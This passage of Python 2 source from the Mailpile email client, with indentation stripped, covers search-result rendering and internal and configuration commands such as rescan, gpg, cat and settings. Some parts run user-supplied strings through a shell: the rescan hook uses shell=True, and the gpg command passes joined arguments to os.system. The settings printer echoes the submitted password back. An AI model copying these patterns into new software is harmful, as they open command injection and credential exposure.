self.add_msg_info(b36(idx_pos), msg_info,
full_threads=full_threads, idxs=idxs)
if emails and len(emails) == 1:
self['summary'] = emails[0].get_msg_info(MailIndex.MSG_SUBJECT)
for e in emails or []:
self.add_email(e)
def add_msg_info(self, mid, msg_info, full_threads=False, idxs=None):
# Populate data.metadata
self['data']['metadata'][mid] = self._metadata(msg_info)
# Populate data.thread
thread_mid = msg_info[self.idx.MSG_THREAD_MID]
if thread_mid not in self['data']['threads']:
thread = self._thread(thread_mid)
self['data']['threads'][thread_mid] = thread
if full_threads and idxs:
idxs.extend([int(t, 36) for t in thread
if t not in self['data']['metadata']])
# Populate data.person
for cid in self._msg_addresses(msg_info):
if cid not in self['data']['addresses']:
self['data']['addresses'][cid] = self._address(cid=cid)
# Populate data.tag
if 'tags' in self.session.config:
for tid in self._msg_tags(msg_info):
if tid not in self['data']['tags']:
self['data']['tags'][tid] = self._tag(tid,
{"searched": False})
def add_email(self, e):
if e not in self.emails:
self.emails.append(e)
mid = e.msg_mid()
if mid not in self['data']['messages']:
self['data']['messages'][mid] = self._message(e)
if mid not in self['message_ids']:
self['message_ids'].append(mid)
# This happens last, as the parsing above may have side-effects
# which matter once we get this far.
self.add_msg_info(mid, e.get_msg_info(uncached=True))
def __nonzero__(self):
return True
def next_set(self):
stats = self['stats']
return SearchResults(self.session, self.idx,
start=stats['start'] - 1 + stats['count'])
def previous_set(self):
stats = self['stats']
return SearchResults(self.session, self.idx,
end=stats['start'] - 1)
def _fix_width(self, text, width):
chars = []
for c in unicode(text):
cwidth = 2 if (unicodedata.east_asian_width(c) in 'WF') else 1
if cwidth <= width:
chars.append(c)
width -= cwidth
else:
break
if width:
chars += [' ' * width]
return ''.join(chars)
def as_text(self):
from mailpile.www.jinjaextensions import MailpileCommand as JE
clen = max(3, len('%d' % len(self.session.results)))
cfmt = '%%%d.%ds' % (clen, clen)
term_width = self.session.ui.term.max_width()
fs_width = int((22 + 53) * (term_width / 79.0))
f_width = min(32, int(0.30 * fs_width))
s_width = fs_width - f_width
text = []
count = self['stats']['start']
expand_ids = [e.msg_idx_pos for e in (self.emails or [])]
addresses = self.get('data', {}).get('addresses', {})
for mid in self['thread_ids']:
m = self['data']['metadata'][mid]
tags = [self['data']['tags'][t] for t in m['tag_tids']]
tag_names = [t['name'] for t in tags
if not t.get('searched', False)
and t.get('label', True)
and t.get('display', '') != 'invisible']
tag_new = [t for t in tags if t.get('type') == 'unread']
tag_names.sort()
msg_meta = tag_names and (' (' + '('.join(tag_names)) or ''
# FIXME: this is a bit ugly, but useful for development
es = ['', '']
for t in [t['slug'] for t in tags]:
if t.startswith('mp_enc') and 'none' not in t:
es[1] = 'E'
if t.startswith('mp_sig') and 'none' not in t:
es[0] = 'S'
es = ''.join([e for e in es if e])
if es:
msg_meta = (msg_meta or ' ') + ('[%s]' % es)
elif msg_meta:
msg_meta += ')'
else:
msg_meta += ' '
msg_meta += elapsed_datetime(m['timestamp'])
from_info = (m['from'].get('fn') or m['from'].get('email')
or '(anonymous)')
if from_info[:1] in ('<', '"', '\''):
from_info = from_info[1:]
if from_info[-1:] in ('>', '"', '\''):
from_info = from_info[:-1]
if '@' in from_info and len(from_info) > 18:
e, d = from_info.split('@', 1)
if d in ('gmail.com', 'yahoo.com', 'hotmail.com'):
from_info = '%s@%s..' % (e, d[0])
else:
from_info = '%s..@%s' % (e[0], d)
if not expand_ids:
def gg(pos):
return (pos < 10) and pos or '>'
thread = [m['thread_mid']]
thread += self['data']['threads'][m['thread_mid']]
if m['mid'] not in thread:
thread.append(m['mid'])
pos = thread.index(m['mid']) + 1
if pos > 1:
from_info = '%s>%s' % (gg(pos-1), from_info)
else:
from_info = ' ' + from_info
if pos < len(thread):
from_info = '%s>%s' % (from_info[:20], gg(len(thread)-pos))
subject = re.sub('^(\\[[^\\]]{6})[^\\]]{3,}\\]\\s*', '\\1..] ',
JE._nice_subject(m))
subject_width = max(1, s_width - (clen + len(msg_meta)))
subject = self._fix_width(subject, subject_width)
from_info = self._fix_width(from_info, f_width)
#sfmt = '%%s%%s' % (subject_width, subject_width)
#ffmt = ' %%s%%s' % (f_width, f_width)
tfmt = cfmt + ' %s%s%s%s'
text.append(tfmt % (count, from_info, tag_new and '*' or ' ',
subject, msg_meta))
if mid in self['data'].get('messages', {}):
exp_email = self.emails[expand_ids.index(int(mid, 36))]
msg_tree = exp_email.get_message_tree()
text.append('-' * term_width)
text.append(exp_email.get_editing_string(msg_tree,
attachment_headers=False).strip())
if msg_tree['attachments']:
text.append('\nAttachments:')
for a in msg_tree['attachments']:
text.append('%5.5s %s' % ('#%s' % a['count'],
a['filename']))
text.append('-' * term_width)
count += 1
if not count:
text = ['(No messages found)']
return '\n'.join(text) + '\n'
##[ Internals ]###############################################################
class Load(Command):
"""Load or reload the metadata index"""
SYNOPSIS = (None, 'load', None, None)
ORDER = ('Internals', 1)
CONFIG_REQUIRED = False
IS_INTERACTIVE = True
def command(self, reset=True, wait=True, wait_all=False, quiet=False):
try:
if self._idx(reset=reset,
wait=wait,
wait_all=wait_all,
quiet=quiet):
return self._success(_('Loaded metadata index'))
else:
return self._error(_('Failed to loaded metadata index'))
except IOError:
return self._error(_('Failed to decrypt configuration, '
'please log in!'))
class Rescan(Command):
"""Add new messages to index"""
SYNOPSIS = (None, 'rescan', 'rescan',
'[full|vcards|vcards:<src>|both|mailboxes|sources|<msgs>]')
ORDER = ('Internals', 2)
LOG_PROGRESS = True
HTTP_CALLABLE = ('POST',)
HTTP_POST_VARS = {
'which': '[full|vcards|vcards:<src>|both|mailboxes|sources|<msgs>]'
}
def command(self, slowly=False):
session, config, idx = self.session, self.session.config, self._idx()
args = list(self.args)
if 'which' in self.data:
args.extend(self.data['which'])
# Pretend we're idle, to make rescan go fast fast.
if not slowly:
mailpile.util.LAST_USER_ACTIVITY = 0
if args and args[0].lower().startswith('vcards'):
return self._success(_('Rescanned vcards'),
result=self._rescan_vcards(session, args[0]))
elif args and args[0].lower() in ('both', 'mailboxes', 'sources',
'editable'):
which = args[0].lower()
return self._success(_('Rescanned mailboxes'),
result=self._rescan_mailboxes(session,
which=which))
elif args and args[0].lower() == 'full':
config.flush_mbox_cache(session, wait=True)
args.pop(0)
# Clear the cache first, in case the user is flailing about
ClearParseCache(full=True)
msg_idxs = self._choose_messages(args)
if msg_idxs:
for msg_idx_pos in msg_idxs:
e = Email(idx, msg_idx_pos)
try:
session.ui.mark('Re-indexing %s' % e.msg_mid())
idx.index_email(self.session, e)
except KeyboardInterrupt:
raise
except:
self._ignore_exception()
session.ui.warning(_('Failed to reindex: %s'
) % e.msg_mid())
self.event.data["messages"] = len(msg_idxs)
self.session.config.event_log.log_event(self.event)
self._background_save(index=True)
return self._success(_('Indexed %d messages') % len(msg_idxs),
result={'messages': len(msg_idxs)})
else:
# FIXME: Need a lock here?
if 'rescan' in config._running:
return self._success(_('Rescan already in progress'))
config._running['rescan'] = True
try:
results = {}
results.update(self._rescan_vcards(session, 'vcards'))
results.update(self._rescan_mailboxes(session))
self.event.data.update(results)
self.session.config.event_log.log_event(self.event)
if 'aborted' in results:
raise KeyboardInterrupt()
return self._success(_('Rescanned vcards and mailboxes'),
result=results)
except (KeyboardInterrupt), e:
return self._error(_('User aborted'), info=results)
finally:
del config._running['rescan']
def _rescan_vcards(self, session, which):
from mailpile.plugins import PluginManager
config = session.config
imported = 0
importer_cfgs = config.prefs.vcard.importers
which_spec = which.split(':')
importers = []
try:
session.ui.mark(_('Rescanning: %s') % 'vcards')
for importer in PluginManager.VCARD_IMPORTERS.values():
if (len(which_spec) > 1 and
which_spec[1] != importer.SHORT_NAME):
continue
importers.append(importer.SHORT_NAME)
for cfg in importer_cfgs.get(importer.SHORT_NAME, []):
if cfg:
imp = importer(session, cfg)
imported += imp.import_vcards(session, config.vcards)
if mailpile.util.QUITTING:
return {'vcards': imported, 'vcard_sources': importers,
'aborted': True}
except KeyboardInterrupt:
return {'vcards': imported, 'vcard_sources': importers,
'aborted': True}
return {'vcards': imported, 'vcard_sources': importers}
def _run_rescan_command(self, session, timeout=120):
pre_command = session.config.prefs.rescan_command
if pre_command and not mailpile.util.QUITTING:
session.ui.mark(_('Running: %s') % pre_command)
if not ('|' in pre_command or
'&' in pre_command or
';' in pre_command):
pre_command = pre_command.split()
cmd = subprocess.Popen(pre_command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=not isinstance(pre_command, list))
countdown = [timeout]
def eat(fmt, fd):
for line in fd:
session.ui.notify(fmt % line.strip())
countdown[0] = timeout
for t in [
threading.Thread(target=eat, args=['E: %s', cmd.stderr]),
threading.Thread(target=eat, args=['O: %s', cmd.stdout])
]:
t.daemon = True
t.start()
try:
while countdown[0] > 0:
countdown[0] -= 1
if cmd.poll() is not None:
rv = cmd.wait()
if rv != 0:
session.ui.notify(_('Rescan command returned %d')
% rv)
return
elif mailpile.util.QUITTING:
return
time.sleep(1)
finally:
if cmd.poll() is None:
session.ui.notify(_('Aborting rescan command'))
cmd.terminate()
time.sleep(0.2)
if cmd.poll() is None:
cmd.kill()
# NOTE: For some reason we were using the un-safe Popen before, not sure
# if that matters. Leaving this commented out for now for reference.
#
# try:
# MakePopenUnsafe()
# subprocess.check_call(pre_command, shell=True)
# finally:
# MakePopenSafe()
def _rescan_mailboxes(self, session, which='mailboxes'):
import mailpile.mail_source
config = session.config
idx = self._idx()
msg_count = 0
mbox_count = 0
rv = True
try:
session.ui.mark(_('Rescanning: %s') % which)
self._run_rescan_command(session)
msg_count = 1
if which in ('both', 'mailboxes', 'editable'):
if which == 'editable':
mailboxes = config.get_mailboxes(mail_sources=True)
else:
mailboxes = config.get_mailboxes(mail_sources=False)
for fid, fpath, sc in mailboxes:
if mailpile.util.QUITTING:
break
if fpath == '/dev/null':
continue
try:
session.ui.mark(_('Rescanning: %s %s')
% (fid, fpath))
if which == 'editable':
count = idx.scan_mailbox(session, fid, fpath,
config.open_mailbox,
process_new=False,
editable=True,
event=self.event)
else:
count = idx.scan_mailbox(session, fid, fpath,
config.open_mailbox,
event=self.event)
except ValueError:
self._ignore_exception()
count = -1
if count < 0:
session.ui.warning(_('Failed to rescan: %s') % fpath)
elif count > 0:
msg_count += count
mbox_count += 1
session.ui.mark('\n')
if which in ('both', 'sources'):
ocount = msg_count - 1
while ocount != msg_count:
ocount = msg_count
sources = config.mail_sources.values()
sources.sort(key=lambda k: random.randint(0, 100))
for src in sources:
if mailpile.util.QUITTING:
ocount = msg_count
break
session.ui.mark(_('Rescanning: %s') % (src, ))
count = src.rescan_now(session)
if count > 0:
msg_count += count
mbox_count += 1
session.ui.mark('\n')
if not session.ui.interactive:
break
msg_count -= 1
session.ui.mark(_('Nothing changed'))
except (KeyboardInterrupt, subprocess.CalledProcessError), e:
return {'aborted': True,
'messages': msg_count,
'mailboxes': mbox_count}
finally:
if msg_count:
session.ui.mark('\n')
if msg_count < 500:
self._background_save(index=True)
else:
self._background_save(index_full=True)
return {'messages': msg_count,
'mailboxes': mbox_count}
class Optimize(Command):
"""Optimize the keyword search index"""
SYNOPSIS = (None, 'optimize', None, '[harder]')
ORDER = ('Internals', 3)
def command(self, slowly=False):
try:
if not slowly:
mailpile.util.LAST_USER_ACTIVITY = 0
self._idx().save(self.session)
GlobalPostingList.Optimize(self.session, self._idx(),
force=('harder' in self.args))
return self._success(_('Optimized search engine'))
except KeyboardInterrupt:
return self._error(_('Aborted'))
class BrowseOrLaunch(Command):
"""Launch browser and exit, if already running"""
SYNOPSIS = (None, 'browse_or_launch', None, None)
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
RAISES = (KeyboardInterrupt,)
@classmethod
def Browse(cls, sspec):
http_url = ('http://%s:%s/' % sspec
).replace('/0.0.0.0:', '/localhost:')
try:
MakePopenUnsafe()
webbrowser.open(http_url)
return http_url
finally:
MakePopenSafe()
return False
def command(self):
config = self.session.config
if config.http_worker:
sspec = config.http_worker.sspec
else:
sspec = (config.sys.http_host, config.sys.http_port)
try:
socket.create_connection(sspec)
self.Browse(sspec)
os._exit(1)
except IOError:
pass
return self._success(_('Launching Mailpile'), result=True)
class RunWWW(Command):
"""Just run the web server"""
SYNOPSIS = (None, 'www', None, '[<host:port>]')
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
def command(self):
config = self.session.config
ospec = (config.sys.http_host, config.sys.http_port)
if self.args:
sspec = self.args[0].split(':', 1)
sspec[1] = int(sspec[1])
else:
sspec = ospec
if self.session.config.http_worker:
self.session.config.http_worker.quit(join=True)
self.session.config.http_worker = None
self.session.config.prepare_workers(self.session,
httpd_spec=tuple(sspec),
daemons=True)
if config.http_worker:
sspec = config.http_worker.httpd.sspec
http_url = 'http://%s:%s/' % sspec
if sspec != ospec:
(config.sys.http_host, config.sys.http_port) = ospec
self._background_save(config=True)
return self._success(_('Moved the web server to %s'
) % http_url)
else:
return self._success(_('Started the web server on %s'
) % http_url)
else:
return self._error(_('Failed to started the web server'))
class WritePID(Command):
"""Write the PID to a file"""
SYNOPSIS = (None, 'pidfile', None, "</path/to/pidfile>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
SPLIT_ARG = False
def command(self):
with open(self.args[0], 'w') as fd:
fd.write('%d' % os.getpid())
return self._success(_('Wrote PID to %s') % self.args)
class RenderPage(Command):
"""Does nothing, for use by semi-static jinja2 pages"""
SYNOPSIS = (None, None, 'page', None)
ORDER = ('Internals', 6)
CONFIG_REQUIRED = False
SPLIT_ARG = False
HTTP_STRICT_VARS = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def __init__(self, *args, **kwargs):
Command.CommandResult.__init__(self, *args, **kwargs)
if self.result and 'path' in self.result:
self.template_id = 'page/' + self.result['path'] + '/index'
def command(self):
return self._success(_('Rendered the page'), result={
'path': (self.args and self.args[0] or ''),
'data': self.data
})
class ProgramStatus(Command):
"""Display list of running threads, locks and outstanding events."""
SYNOPSIS = (None, 'ps', 'ps', None)
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
LOG_NOTHING = True
class CommandResult(Command.CommandResult):
def as_text(self):
now = time.time()
sessions = self.result.get('sessions')
if sessions:
sessions = '\n'.join(sorted([' %s/%s = %s (%ds)'
% (us['sessionid'],
us['userdata'],
us['userinfo'],
now - us['timestamp'])
for us in sessions]))
else:
sessions = ' ' + _('Nothing Found')
ievents = self.result.get('ievents')
cevents = self.result.get('cevents')
if cevents:
cevents = '\n'.join([' %s' % (e.as_text(compact=True),)
for e in cevents])
else:
cevents = ' ' + _('Nothing Found')
ievents = self.result.get('ievents')
if ievents:
ievents = '\n'.join([' %s' % (e.as_text(compact=True),)
for e in ievents])
else:
ievents = ' ' + _('Nothing Found')
threads = self.result.get('threads')
if threads:
threads = '\n'.join(sorted([(' ' + str(t)) for t in threads]))
else:
threads = _('Nothing Found')
locks = self.result.get('locks')
if locks:
locks = '\n'.join(sorted([(' %s.%s is %slocked'
) % (l[0], l[1],
'' if l[2] else 'un')
for l in locks]))
else:
locks = _('Nothing Found')
return ('Recent events:\n%s\n\n'
'Events in progress:\n%s\n\n'
'Live sessions:\n%s\n\n'
'Postinglist timers:\n%s\n\n'
'Threads: (bg delay %.3fs, live=%s, httpd=%s)\n%s\n\n'
'Locks:\n%s'
) % (cevents, ievents, sessions,
self.result['pl_timers'],
self.result['delay'],
self.result['live'],
self.result['httpd'],
threads, locks)
def command(self, args=None):
import mailpile.auth
import mailpile.mail_source
import mailpile.plugins.compose
import mailpile.plugins.contacts
config = self.session.config
try:
idx = config.index
locks = [
('config.index', '_lock', idx._lock._is_owned()),
('config.index', '_save_lock', idx._save_lock._is_owned())
]
except AttributeError:
locks = []
if config.vcards:
locks.extend([
('config.vcards', '_lock', config.vcards._lock._is_owned()),
])
locks.extend([
('config', '_lock', config._lock._is_owned()),
('mailpile.postinglist', 'GLOBAL_POSTING_LOCK',
mailpile.postinglist.GLOBAL_POSTING_LOCK._is_owned()),
('mailpile.postinglist', 'GLOBAL_OPTIMIZE_LOCK',
mailpile.plugins.compose.GLOBAL_EDITING_LOCK._is_owned()),
('mailpile.plugins.compose', 'GLOBAL_EDITING_LOCK',
mailpile.plugins.contacts.GLOBAL_VCARD_LOCK._is_owned()),
('mailpile.plugins.contacts', 'GLOBAL_VCARD_LOCK',
mailpile.postinglist.GLOBAL_OPTIMIZE_LOCK.locked()),
('mailpile.postinglist', 'GLOBAL_GPL_LOCK',
mailpile.postinglist.GLOBAL_GPL_LOCK._is_owned()),
])
threads = threading.enumerate()
for thread in threads:
try:
if hasattr(thread, 'lock'):
locks.append([thread, 'lock', thread.lock])
if hasattr(thread, '_lock'):
locks.append([thread, '_lock', thread._lock])
if locks and hasattr(locks[-1][-1], 'locked'):
locks[-1][-1] = locks[-1][-1].locked()
elif locks and hasattr(locks[-1][-1], '_is_owned'):
locks[-1][-1] = locks[-1][-1]._is_owned()
except AttributeError:
pass
import mailpile.auth
import mailpile.httpd
result = {
'sessions': [{'sessionid': k,
'timestamp': v.ts,
'userdata': v.data,
'userinfo': v.auth} for k, v in
mailpile.auth.SESSION_CACHE.iteritems()],
'pl_timers': mailpile.postinglist.TIMERS,
'delay': play_nice_with_threads(sleep=False),
'live': mailpile.util.LIVE_USER_ACTIVITIES,
'httpd': mailpile.httpd.LIVE_HTTP_REQUESTS,
'threads': threads,
'locks': sorted(locks)
}
if config.event_log:
result.update({
'cevents': list(config.event_log.events(flag='c'))[-10:],
'ievents': config.event_log.incomplete(),
})
return self._success(_("Listed events, threads, and locks"),
result=result)
class GpgCommand(Command):
"""Interact with GPG directly"""
SYNOPSIS = (None, 'gpg', None, "<GPG arguments ...>")
ORDER = ('Internals', 4)
IS_USER_ACTIVITY = True
def command(self, args=None):
args = list((args is None) and self.args or args or [])
# FIXME: For this to work anywhere but in a terminal, we'll need
# to somehow pipe input to/from GPG in a more sane way.
from mailpile.crypto.gpgi import GPG_BINARY
with self.session.ui.term:
try:
self.session.ui.block()
os.system(' '.join([GPG_BINARY] + args))
except:
self.session.ui.unblock()
return self._success(_("That was fun!"))
class ListDir(Command):
"""Display working directory listing"""
SYNOPSIS = (None, 'ls', None, "<.../new/path/...>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def as_text(self):
if self.result:
lines = []
for fn, sz, isdir in self.result:
lines.append(('%10.10s %s%s'
) % (sz, fn, isdir and '/' or ''))
return '\n'.join(lines)
else:
return _('Nothing Found')
def command(self, args=None):
args = list((args is None) and self.args or args or [])
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
file_list = [(f.decode('utf-8'),
os.path.getsize(f),
os.path.isdir(f))
for f in os.listdir('.') if not f.startswith('.')
and not args or [a for a in args if a in f]]
file_list.sort(key=lambda i: i[0].lower())
return self._success(_('Current directory is %s') % os.getcwd(),
result=file_list)
except (OSError, IOError, UnicodeDecodeError), e:
return self._error(_('Failed to list directory: %s') % e)
class ChangeDir(ListDir):
"""Change working directory"""
SYNOPSIS = (None, 'cd', None, "<.../new/path/...>")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
def command(self, args=None):
args = list((args is None) and self.args or args or [])
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
os.chdir(args.pop(0).encode('utf-8'))
return ListDir.command(self, args=args)
except (OSError, IOError, UnicodeEncodeError), e:
return self._error(_('Failed to change directories: %s') % e)
class CatFile(Command):
"""Dump the contents of a file, decrypting if necessary"""
SYNOPSIS = (None, 'cat', None, "</path/to/file> [>/path/to/output]")
ORDER = ('Internals', 5)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = True
class CommandResult(Command.CommandResult):
def as_text(self):
if isinstance(self.result, list):
return ''.join(self.result)
else:
return ''
def command(self, args=None):
lines = []
files = list(args or self.args)
if self.session.config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
target = tfd = None
if files and files[-1] and files[-1][:1] == '>':
target = files.pop(-1)[1:]
if os.path.exists(target):
return self._error(_('That file already exists: %s'
) % target)
tfd = open(target, 'wb')
cb = lambda ll: [tfd.write(l) for l in ll]
else:
cb = lambda ll: lines.extend((l.decode('utf-8') for l in ll))
for fn in files:
with open(fn, 'r') as fd:
decrypt_and_parse_lines(fd, cb, self.session.config,
newlines=True, decode=None)
if tfd:
tfd.close()
return self._success(_('Dumped to %s: %s'
) % (target, ', '.join(files)))
else:
return self._success(_('Dumped: %s') % ', '.join(files),
result=lines)
##[ Configuration commands ]###################################################
class ConfigSet(Command):
"""Change a setting"""
SYNOPSIS = ('S', 'set', 'settings/set', '<section.variable> <value>')
ORDER = ('Config', 1)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
HTTP_STRICT_VARS = False
HTTP_POST_VARS = {
'_section': 'common section, create if needed',
'section.variable': 'value|json-string'
}
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
config = self.session.config
args = list(self.args)
ops = []
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
if not config.loaded_config:
self.session.ui.warning(_('WARNING: Any changes will '
'be overwritten on login'))
section = self.data.get('_section', [''])[0]
if section:
# Make sure section exists
ops.append((section, '!CREATE_SECTION'))
for var in self.data.keys():
if var in ('_section', '_method'):
continue
sep = '/' if ('/' in (section+var)) else '.'
svar = (section+sep+var) if section else var
parts = svar.split(sep)
if parts[0] in config.rules:
if svar.endswith('[]'):
ops.append((svar[:-2], json.dumps(self.data[var])))
else:
ops.append((svar, self.data[var][0]))
else:
raise ValueError(_('Invalid section or variable: %s') % var)
if self.args:
arg = ' '.join(self.args)
if '=' in arg:
# Backwards compatiblity with the old 'var = value' syntax.
var, value = [s.strip() for s in arg.split('=', 1)]
var = var.replace(': ', '.').replace(':', '.').replace(' ', '')
else:
var, value = arg.split(' ', 1)
ops.append((var, value))
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = {}
for path, value in ops:
value = value.strip()
if value[:1] in ('{', '[') and value[-1:] in ( ']', '}'):
value = json.loads(value)
try:
try:
cfg, var = config.walk(path.strip(), parent=1)
if value == '!CREATE_SECTION':
if var not in cfg:
cfg[var] = {}
else:
cfg[var] = value
updated[path] = value
except IndexError:
cfg, v1, v2 = config.walk(path.strip(), parent=2)
cfg[v1] = {v2: value}
except TypeError:
raise ValueError('Could not set variable: %s' % path)
if config.loaded_config:
self._background_save(config=True)
return self._success(_('Updated your settings'), result=updated)
class ConfigAdd(Command):
"""Add a new value to a list (or ordered dict) setting"""
SYNOPSIS = (None, 'append', 'settings/add', '<section.variable> <value>')
ORDER = ('Config', 1)
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
HTTP_STRICT_VARS = False
HTTP_POST_VARS = {
'section.variable': 'value|json-string',
}
IS_USER_ACTIVITY = True
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
config = self.session.config
ops = []
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
for var in self.data.keys():
parts = ('.' in var) and var.split('.') or var.split('/')
if parts[0] in config.rules:
ops.append((var, self.data[var][0]))
if self.args:
arg = ' '.join(self.args)
if '=' in arg:
# Backwards compatible with the old 'var = value' syntax.
var, value = [s.strip() for s in arg.split('=', 1)]
var = var.replace(': ', '.').replace(':', '.').replace(' ', '')
else:
var, value = arg.split(' ', 1)
ops.append((var, value))
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = {}
for path, value in ops:
value = value.strip()
if value.startswith('{') or value.startswith('['):
value = json.loads(value)
cfg, var = config.walk(path.strip(), parent=1)
cfg[var].append(value)
updated[path] = value
if updated:
self._background_save(config=True)
return self._success(_('Updated your settings'), result=updated)
class ConfigUnset(Command):
"""Reset one or more settings to their defaults"""
SYNOPSIS = ('U', 'unset', 'settings/unset', '<var>')
ORDER = ('Config', 2)
HTTP_CALLABLE = ('POST', )
HTTP_POST_VARS = {
'var': 'section.variables'
}
IS_USER_ACTIVITY = True
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
session, config = self.session, self.session.config
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
def unset(cfg, key):
if isinstance(cfg[key], dict):
if '_any' in cfg[key].rules:
for skey in cfg[key].keys():
del cfg[key][skey]
else:
for skey in cfg[key].keys():
unset(cfg[key], skey)
elif isinstance(cfg[key], list):
cfg[key] = []
else:
del cfg[key]
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
updated = []
vlist = list(self.args) + (self.data.get('var', None) or [])
for v in vlist:
cfg, vn = config.walk(v, parent=True)
unset(cfg, vn)
if updated:
self._background_save(config=True)
return self._success(_('Reset to default values'), result=updated)
class ConfigPrint(Command):
"""Print one or more settings"""
SYNOPSIS = ('P', 'print', 'settings', '[-short|-secrets|-flat] <var>')
ORDER = ('Config', 3)
CONFIG_REQUIRED = False
IS_USER_ACTIVITY = False
HTTP_CALLABLE = ('GET', 'POST')
HTTP_QUERY_VARS = {
'var': 'section.variable',
'short': 'Set True to omit unchanged values (defaults)',
'secrets': 'Set True to show passwords and other secrets'
}
HTTP_POST_VARS = {
'user': 'Authenticate as user',
'pass': 'Authenticate with password'
}
def _maybe_all(self, list_all, data, key_types, recurse, sanitize):
if isinstance(data, (dict, list)) and list_all:
rv = {}
for key in data.all_keys():
if [t for t in data.key_types(key) if t not in key_types]:
# Silently omit things that are considered sensitive
continue
rv[key] = data[key]
if hasattr(rv[key], 'all_keys'):
if recurse:
rv[key] = self._maybe_all(True, rv[key], key_types,
recurse, sanitize)
else:
if 'name' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['name']
elif 'description' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['description']
elif 'host' in rv[key]:
rv[key] = '{ ..(%s).. }' % rv[key]['host']
else:
rv[key] = '{ ... }'
elif sanitize and key.lower()[:4] in ('pass', 'secr'):
rv[key] = '(SUPPRESSED)'
return rv
return data
def command(self):
session, config = self.session, self.session.config
result = {}
invalid = []
args = list(self.args)
recurse = not self.data.get('flat', ['-flat' in args])[0]
list_all = not self.data.get('short', ['-short' in args])[0]
sanitize = not self.data.get('secrets', ['-secrets' in args])[0]
# FIXME: Shouldn't we suppress critical variables as well?
key_types = ['public', 'critical']
access_denied = False
if self.data.get('_method') == 'POST':
if 'pass' in self.data:
from mailpile.auth import CheckPassword
password = self.data['pass'][0]
auth_user = CheckPassword(config,
self.data.get('user', [None])[0],
password)
if auth_user == 'DEFAULT':
key_types += ['key']
result['_auth_user'] = auth_user
result['_auth_pass'] = password
for key in (args + self.data.get('var', [])):
if key in ('-short', '-flat', '-secrets'):
continue
try:
data = config.walk(key, key_types=key_types)
result[key] = self._maybe_all(list_all, data, key_types,
recurse, sanitize)
except AccessError:
access_denied = True
invalid.append(key)
except KeyError:
invalid.append(key)
if invalid:
return self._error(_('Invalid keys'),
result=result, info={
'keys': invalid,
'key_types': key_types,
'access_denied': access_denied
})
else:
return self._success(_('Displayed settings'), result=result)
class AddMailboxes(Command):
"""Add one or more mailboxes"""
SYNOPSIS = ('A', 'add', None, '<path/to/mailbox>')
ORDER = ('Config', 4)
SPLIT_ARG = False
HTTP_CALLABLE = ('POST', 'UPDATE')
IS_USER_ACTIVITY = True
MAX_PATHS = 50000
def command(self):
from mailpile.httpd import BLOCK_HTTPD_LOCK, Idle_HTTPD
session, config = self.session, self.session.config
adding = []
existing = config.sys.mailbox
paths = list(self.args)
if config.sys.lockdown:
return self._error(_('In lockdown, doing nothing.'))
try:
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if raw_fn in existing or fn in existing:
session.ui.warning('Already in the pile: %s' % raw_fn)
elif raw_fn.startswith("imap://"):
adding.append(raw_fn)
elif IsMailbox(fn, config):
adding.append(raw_fn)
elif os.path.exists(fn) and os.path.isdir(fn):
session.ui.mark('Scanning %s for mailboxes' % fn)
try:
for f in [f for f in os.listdir(fn)
if not f.startswith('.')]:
paths.append(os.path.join(fn, f))
if len(paths) > self.MAX_PATHS:
return self._error(_('Too many files'))
except OSError:
if raw_fn in self.args:
return self._error(_('Failed to read: %s'
) % raw_fn)
elif raw_fn in self.args:
return self._error(_('No such file or directory: %s'
) % raw_fn)
except KeyboardInterrupt:
return self._error(_('User aborted'))
added = {}
# We don't have transactions really, but making sure the HTTPD
# is idle (aside from this request) will definitely help.
with BLOCK_HTTPD_LOCK, Idle_HTTPD():
for arg in adding:
added[config.sys.mailbox.append(arg)] = arg
if added:
self._background_save(config=True)
return self._success(_('Added %d mailboxes') % len(added),
result={'added': added})
else:
return self._success(_('Nothing was added'))
###############################################################################
class Cached(Command):
"""Fetch results from the command cache."""
SYNOPSIS = (None, 'cached', 'cached', '[<cache-id>]')
ORDER = ('Internals', 7)
HTTP_QUERY_VARS = {'id': 'Cache ID of command to redisplay'}
IS_USER_ACTIVITY = False
LOG_NOTHING = True
def run(self):
try:
cid = self.args[0] if self.args else self.data.get('id', [None])[0]
rv = self.session.config.command_cache.get_result(cid)
self.session.copy(rv.session)
rv.session.ui.render_mode = self.session.ui.render_mode
return rv
except:
self._starting()
self._ignore_exception()
self._error(self.FAILURE % {'name': self.name,
'args': ' '.join(self.args)})
return self._finishing(False)
class Output(Command):
"""Choose format for command results."""
